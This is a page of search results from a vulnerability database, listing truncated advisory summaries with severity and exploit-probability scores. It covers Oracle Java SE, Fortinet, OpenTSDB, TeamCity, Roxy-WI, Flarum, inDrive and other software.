Lucene search
K

157 matches found

Prion
Prion
added 2024/01/16 10:15 p.m.31 views

Buffer overflow

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Scripting. Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition:...

2.6CVSS6.5AI score0.01026EPSS
Exploits0References3Affected Software5
CNVD
CNVD
added 2023/09/08 12:0 a.m.7 views

Fortinet FortiSwitchManager Improper Access Control Vulnerability

Fortinet FortiSwitchManager is a network switch management tool from Fortinet designed to help organizations manage their FortiSwitch family of network switches. An improper access control vulnerability exists in Fortinet FortiSwitchManager. The vulnerability is caused by a flawed authentication...

7.1CVSS6.8AI score0.00382EPSS
Exploits0References1
Hacker One
Hacker One
added 2023/08/27 1:22 a.m.53 views

inDrive: Unlimited fake rate to the passenger in city to city, Affected endpoint `/api/v1/reviews/ride/<ID>/driver`

The vulnerability allowed an unlimited increase of the passenger's rating in the city-to-city shared ride feature. The request to the /api/v1/reviews/ride//driver endpoint was manipulated by changing the rating value to a higher number, which was accepted by the application and resulted in an...

7AI score
Exploits0
Prion
Prion
added 2023/08/02 1:15 p.m.18 views

Code injection

The "upsell" widget for the portal allows to specify a product description. This description taken from a user-controllable jslob did not get escaped before being added to DOM. Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering...

4.9CVSS5.6AI score0.00558EPSS
Exploits0References4Affected Software1
Prion
Prion
added 2023/06/19 5:15 p.m.22 views

Design/Logic Flaw

Vulnerability of system restart triggered by abnormal callbacks passed to APIs.Successful exploitation of this vulnerability may cause the system to restart...

5CVSS7.5AI score0.00434EPSS
Exploits0References1Affected Software1
Vulnrichment
Vulnrichment
added 2023/06/19 12:0 a.m.10 views

CVE-2023-34166

Vulnerability of system restart triggered by abnormal callbacks passed to APIs.Successful exploitation of this vulnerability may cause the system to restart...

6.8AI score0.00434EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2023/05/03 6:33 p.m.9 views

CVE-2023-25826 Remote Code Execution in OpenTSDB

Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was...

9.8CVSS9.7AI score0.35604EPSS
Exploits4References3
UbuntuCve
UbuntuCve
added 2023/04/18 8:15 p.m.30 views

CVE-2023-21954

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Hotspot. Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit...

5.9CVSS6.8AI score0.01421EPSS
Exploits0References3
Prion
Prion
added 2023/04/18 8:15 p.m.25 views

Design/Logic Flaw

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JSSE. Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit...

2.6CVSS5.9AI score0.01523EPSS
Exploits0References6Affected Software5
Positive Technologies
Positive Technologies
added 2023/04/17 12:0 a.m.5 views

PT-2023-8788 · Haproxy +4 · Haproxy +4

Name of the Vulnerable Software and Affected Versions: Roxy-WI version 6.3.9.0 Description: A Path Traversal issue was found in Roxy-WI, a web interface for managing Haproxy, Nginx, Apache, and Keepalived servers. This issue can be exploited via an HTTP request to "/app/options.py" and the config...

6.8CVSS6.3AI score0.00902EPSS
Exploits1References7
Rapid7 Blog
Rapid7 Blog
added 2023/04/11 1:0 p.m.10 views

Raptor Technologies Volunteer Management Client-Side Security Controls (FIXED)

Prior to Mar 18, 2023, due to a reliance on client-side controls, authorized users of Raptor Technologies Volunteer Management SaaS products could effectively enumerate authorized users, and could modify restricted and unrestricted fields in the accounts of other users associated with the same...

6.1AI score
Exploits0
Positive Technologies
Positive Technologies
added 2023/03/04 12:0 a.m.3 views

PT-2023-8748

Name of the Vulnerable Software and Affected Versions JetBrains TeamCity versions prior to 2023.11.4 Description JetBrains TeamCity contains an authentication bypass issue due to an alternative path vulnerability. Successful exploitation allows an unauthenticated attacker to perform any action,...

10CVSS8.1AI score0.99991EPSS
Exploits25References231
Vulnrichment
Vulnrichment
added 2023/02/09 12:0 a.m.10 views

CVE-2022-48301

The bundle management module lacks permission verification in some APIs. Successful exploitation of this vulnerability may restore the pre-installed apps that have been uninstalled...

7.2AI score0.00327EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2023/01/13 6:3 p.m.6 views

CVE-2023-22489 Flarum is missing authorization in discussion replies

Flarum is a discussion platform for websites. If the first post of a discussion is permanently deleted but the discussion stays visible, any actor who can view the discussion is able to create a new reply via the REST API, no matter the reply permission or lock status. This includes users that...

3.5CVSS4.1AI score0.00555EPSS
Exploits0References3
Huntr
Huntr
added 2022/12/26 7:36 a.m.24 views

Get all file in resource of any user and Delete any file of any user via IDOR

Description Easily GET information of all files uploaded by all users in Resources via API https://demo.usememos.com/api/resource/$idresource method GET Easily DELETE of all files uploaded by all users in Resources via API https://demo.usememos.com/api/resource/$idresource method DELETE Proof of...

6.5CVSS0.6AI score0.00811EPSS
Exploits1
Positive Technologies
Positive Technologies
added 2022/11/25 12:0 a.m.6 views

PT-2023-2665

Name of the Vulnerable Software and Affected Versions Oracle Java SE versions 8u361, 8u361-perf, 11.0.18, 17.0.6, 20 Oracle GraalVM Enterprise Edition versions 20.3.9, 21.3.5, 22.3.1 Description The issue allows an unauthenticated attacker with network access via multiple protocols to compromise...

3.7CVSS6.7AI score0.01036EPSS
Exploits0References362
Vulnrichment
Vulnrichment
added 2022/10/25 4:34 p.m.7 views

CVE-2022-35268

A denial of service vulnerability exists in the webserver hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the...

4.9CVSS7.3AI score0.00904EPSS
Exploits1References1
Vulnrichment
Vulnrichment
added 2022/10/25 4:34 p.m.8 views

CVE-2022-35264

A denial of service vulnerability exists in the webserver hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the...

4.9CVSS5.7AI score0.00904EPSS
Exploits1References1
RedhatCVE
RedhatCVE
added 2022/10/19 9:47 a.m.46 views

CVE-2022-21624

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JNDI. Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit...

3.7CVSS2.3AI score0.01401EPSS
Exploits0References3
RedhatCVE
RedhatCVE
added 2022/04/20 8:47 a.m.69 views

CVE-2022-21496

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JNDI. Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable...

5.3CVSS2.2AI score0.02651EPSS
Exploits0References3
Rows per page
Query Builder